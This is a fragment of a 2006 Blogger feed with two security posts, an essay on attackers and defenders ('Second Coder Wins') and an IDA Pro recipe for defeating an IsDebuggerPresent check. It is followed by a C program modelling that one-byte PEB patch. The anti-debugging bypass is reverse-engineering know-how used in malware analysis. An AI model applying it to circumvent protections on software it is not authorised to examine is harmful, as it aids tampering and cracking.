src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2964522372103299191</id><published>2006-09-04T12:22:00.000-07:00</published><updated>2006-09-04T12:28:20.441-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Second Coder Wins</title><content type='html'>Second coder wins&lt;br /&gt;&lt;br /&gt;I subscribe to  the school of thought that says the second coder always wins.  By that, I mean that after you write your "undetectable" rootkit, someone will analyze it, and find a way to detect it.  
If your malware kills all the protection mechanisms on a victim, then the AV vendors will recode their apps so that the technique you used to kill them no longer works.  IDS vendors will find a way to detect your IDS evasion, and so on.&lt;br /&gt;&lt;br /&gt;Exceptions: Crypto might be an exception, though I've been surprised by the number of crypto algorithms that have fallen in recent years.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2964522372103299191?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2964522372103299191/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2964522372103299191' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2964522372103299191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2964522372103299191'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/second-coder-wins-i-subscribe-to-school.html' title='Second Coder Wins'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-115571219725036255</id><published>2006-08-16T00:04:00.000-07:00</published><updated>2006-08-16T00:10:29.526-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spare brain'/><title type='text'></title><content type='html'>In IDA Pro, to defeat a simple 
IsDebuggerPresent check&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Set a breakpoint at the top of the start function&lt;/li&gt;&lt;li&gt;F9 to run the program&lt;/li&gt;&lt;li&gt;Shift-F2 to open the IDC window&lt;/li&gt;&lt;li&gt;PatchByte ( EBX+2, 0);&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-115571219725036255?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/115571219725036255/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=115571219725036255' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/115571219725036255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/115571219725036255'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/08/in-ida-pro-to-defeat-simple.html' title=''/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry></feed>
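Why the IDC one-liner in the last post patches EBX+2: at the entry point of a 32-bit Windows process of that era, EBX holds the PEB pointer, and IsDebuggerPresent() does nothing more than return the BeingDebugged byte at PEB+2. The following C is an added example, not code from the post or from IDA; the model_peb32 struct is a hand-written model of the first bytes of the x86 PEB (the documented field order), and the function names (model_is_debugger_present, patch_being_debugged, protected_entry, demo, real_peb) are illustrative. It builds on any platform; only the real_peb() helper needs 32-bit MSVC.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of the start of the 32-bit Windows PEB (Process Environment Block).
 * Field order and offsets follow the documented x86 layout, but this struct is
 * an added model, not a Windows header, so the file compiles anywhere.
 * IsDebuggerPresent() is: fs:[0x30] -> PEB; return PEB->BeingDebugged.
 */
typedef struct {
    uint8_t  InheritedAddressSpace;     /* +0x00 */
    uint8_t  ReadImageFileExecOptions;  /* +0x01 */
    uint8_t  BeingDebugged;             /* +0x02: the byte PatchByte(EBX+2, 0) clears */
    uint8_t  BitField;                  /* +0x03 */
    uint32_t Mutant;                    /* +0x04: a HANDLE on real x86 */
} model_peb32;

/* The offset the IDC line relies on; 2 for this layout. */
size_t being_debugged_offset(void)
{
    return offsetof(model_peb32, BeingDebugged);
}

/* Equivalent of IsDebuggerPresent(): read the flag byte out of the PEB. */
int model_is_debugger_present(const uint8_t *peb)
{
    return peb[offsetof(model_peb32, BeingDebugged)] != 0;
}

/* Equivalent of PatchByte(EBX+2, 0): with EBX == PEB at the entry point,
 * EBX+2 is BeingDebugged. */
void patch_being_debugged(uint8_t *ebx)
{
    ebx[2] = 0;
}

/* The kind of check the post defeats, as the target program would run it. */
const char *protected_entry(const uint8_t *peb)
{
    if (model_is_debugger_present(peb))
        return "debugger detected, exiting";
    return "running normally";
}

/*
 * Walk the post's procedure against the model: a debugger is attached (flag
 * set, constructed here), the check would fire, the byte at EBX+2 is patched,
 * and the same check now passes. Returns 1 when the patch defeated the check.
 */
int demo(void)
{
    model_peb32 peb;
    uint8_t *ebx;

    memset(&peb, 0, sizeof peb);
    peb.BeingDebugged = 1;          /* constructed: what the loader sets under a debugger */
    ebx = (uint8_t *)&peb;          /* what EBX points at when the breakpoint at start hits */

    if (strcmp(protected_entry(ebx), "debugger detected, exiting") != 0)
        return 0;
    patch_being_debugged(ebx);      /* the Shift-F2 IDC line */
    return strcmp(protected_entry(ebx), "running normally") == 0;
}

#if defined(_MSC_VER) && defined(_M_IX86)
#include <intrin.h>
/* On a real 32-bit MSVC build: the live PEB, where the same byte sits at +2. */
uint8_t *real_peb(void)
{
    return (uint8_t *)__readfsdword(0x30);
}
#endif

int main(void)
{
    printf("BeingDebugged is at PEB+%u\n", (unsigned)being_debugged_offset());
    printf("patch defeats the check: %s\n", demo() ? "yes" : "no");
    return demo() ? 0 : 1;
}
```

The one-byte patch only defeats reads of BeingDebugged, whether through IsDebuggerPresent() or inline fs:[0x30] code. A target that also reads NtGlobalFlag (PEB+0x68 on x86), inspects heap flags, or calls NtQueryInformationProcess with ProcessDebugPort is not affected by it, which is why the post qualifies the technique as being for a "simple" check.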
